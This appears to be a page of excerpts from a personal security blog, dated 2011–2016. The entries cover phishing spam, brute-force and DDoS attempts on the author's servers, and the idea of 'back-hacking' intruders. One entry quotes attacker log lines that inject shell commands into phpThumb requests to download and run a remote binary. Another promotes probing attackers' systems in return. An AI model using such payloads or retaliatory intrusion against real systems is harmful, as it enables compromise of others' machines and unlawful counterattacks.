Back-Hacking

Back-Hacker Blog

Member for

6 months 4 weeks
Submitted by AlReaud on Sun, 11/13/2016 - 14:17

The Back-Hacking Blog came into existence around December 2011 after I started using Kali Linux. It comes from the idea of defending against hackers in a manner similar to Krav Maga. The putative system or security administrator doesn't just sit there passively receiving attacks, rather in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first Back-Hacking link (and this one). There are legal, ethical and logistical questions to be addressed. Sometimes it is quite effective, as related in SunTrust Spoof: Additional ways of protecting your SunTrust access it can be quite effective. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My personal position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.

Hitting the nail on the head...

Member for

6 months 4 weeks
Submitted by AlReaud on Mon, 10/31/2016 - 18:33

Since publishing the article “Beware those scam emails from .top, .stream and .download domains” I must have pissed somebody off by giving some good advice. Since then I've been literally inundated with spam emails from the domains .top, .stream, .download and .win. When I cleared the junk filters out, I had almost 800 junk emails for the week of Sunday October 23 - Saturday, October 29, 2016. This week the count is at 132 so far (see image below)! That previous weekly total is more than I usually get in a month. Further I've had some idiot with the email address something like dhawalnator[at]gmail.com emailing Toyota and Hundai dealerships in San Jose, Fresno, and other cities in California giving my phone number and saying that I'm interested in a vehicle. Actually it's kind of funny, because I answer the calls and tell them that they are sadly the victim of a retaliatory email scam. That went on all last week. I need one of those dealerships to forward that email to alreaud[at]happycattech.com so I can analyze it.

This leads me to believe that I gave out good advice that is effective in preventing email phishers/scammers from being successful. So I'll give y'all another piece of advice, gratis. Use the Thunderbird email browser. It has one of the best

Beware those scam emails from .top, .stream and .download domains

Member for

6 months 4 weeks
Submitted by AlReaud on Mon, 10/03/2016 - 17:43

Since the advent of .top, .stream, and .download domains there has been a plethora of new spam emails that are flooding the Internet. This result comes from cheap hosting accounts available from many providers. Hosting providers have no incentive, however, to stop this because they are making money from hosting questionable accounts, and there are technical and legal challenges to stopping spam.

Spotting the scam emails is pretty easy, they usually come from strange addresses ending in .top, .stream, or .download, but can be from other domains with entreaties to protect children, etc. Usually, but not always, the emails contain only images, and the links are very ephemeral. The most important thing you can do to protect yourself from these is to DISABLE REMOTE CONTENT (Google your specific email browser to get the information on how to do so). The next most important thing, other than marking them as spam and deleting them immediately, is to set filters that mark and delete email from .top, .stream, and .download domains.

By disabling remote content, the image that is usually enclosed in the spam email isn't downloaded. That prevents the compromised server these things redirect to from knowing that your email address is valid and being read. It can do so because as seen below, the embedded links in the email have a unique signature that is associated with your email address.

Five examples are (redirects are done using the text only browser, Lynx, and Wireshark for packet capture, PLEASE DON'T FOLLOW ANY OF THE LINKS BELOW UNLESS YOU ABSOLUTELY KNOW WHAT YOU ARE DOING!):

Very Quiet on the Server Front

Member for

6 months 4 weeks
Submitted by AlReaud on Tue, 01/10/2012 - 22:21

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute forcing the root, some brute forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute forcing. Majority of attacks last week from CN, then US.

The activity has changed to the on-line servers, where I occasionally get DOS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DOS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

Disecting a Spoof Craigs List Email

Member for

6 months 4 weeks
Submitted by AlReaud on Tue, 12/27/2011 - 09:29

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NO ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigs List phishing email attempting to get your login.

The most important above is that when you hover over the link, you can see in the status bar

Punishment DDOS attacks on online server

Member for

6 months 4 weeks
Submitted by AlReaud on Sat, 12/24/2011 - 08:16

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDOS attacks started in the late evening, starting probably around 21:00 through at least probably midnight. Can't actually tell because I can't access the httpd logs. The positive note is this lead to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allow access to the server logs, but Yahoo did not when I used them. It's a virtual machine so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR, I know the bot-net there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area,

Rise of the Machine. A week of wetware against bots...

Member for

6 months 4 weeks
Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL. cheeky

One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

 161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20
-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;c
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]
=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses,

Persistent attacks from one IP in India

Member for

6 months 4 weeks
Submitted by AlReaud on Mon, 12/12/2011 - 08:10

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead on the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low level weaknesses,  with a server running at port 631. The interpretation of that is that the hacking is intentional, because without weakness present, it somewhat eliminates unintentional bots, as with the Church last week. Most of the systems examined so far have certain weaknesses present, such as http TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their

Sea Change in Attack Vectors

Member for

6 months 4 weeks
Submitted by AlReaud on Thu, 12/08/2011 - 12:29

NOTE: Updated 11/15/2016

There's been a sea change in the attack vectors coming into the testing server, and some interesting characters.

For approximately two weeks, we've been subject to "IP Agile" attacks. The term "IP Agile" is something borrowed from a piece of high end R&D lab equipment, a Fluke frequency-agile signal generator. The "IP Agile" attackers use numerous IP addresses that repeat only occasionally over a span of hours, evading tools like fail2ban. There also seems to be a specific cycle through countries, China, Brazil, Japan, EU (UK or France),  Taiwan, then repeating, though I don't yet have enough data.

This set of attackers seems to be hitting mail servers and phone branch exchange (PBX) servers mostly. Found a great site at a church in Lafayette, IN that had their website infested. The trick was that you only saw the spam if you had javascripts disabled. Called them up and spoke to a parishioner manning the phones, and followed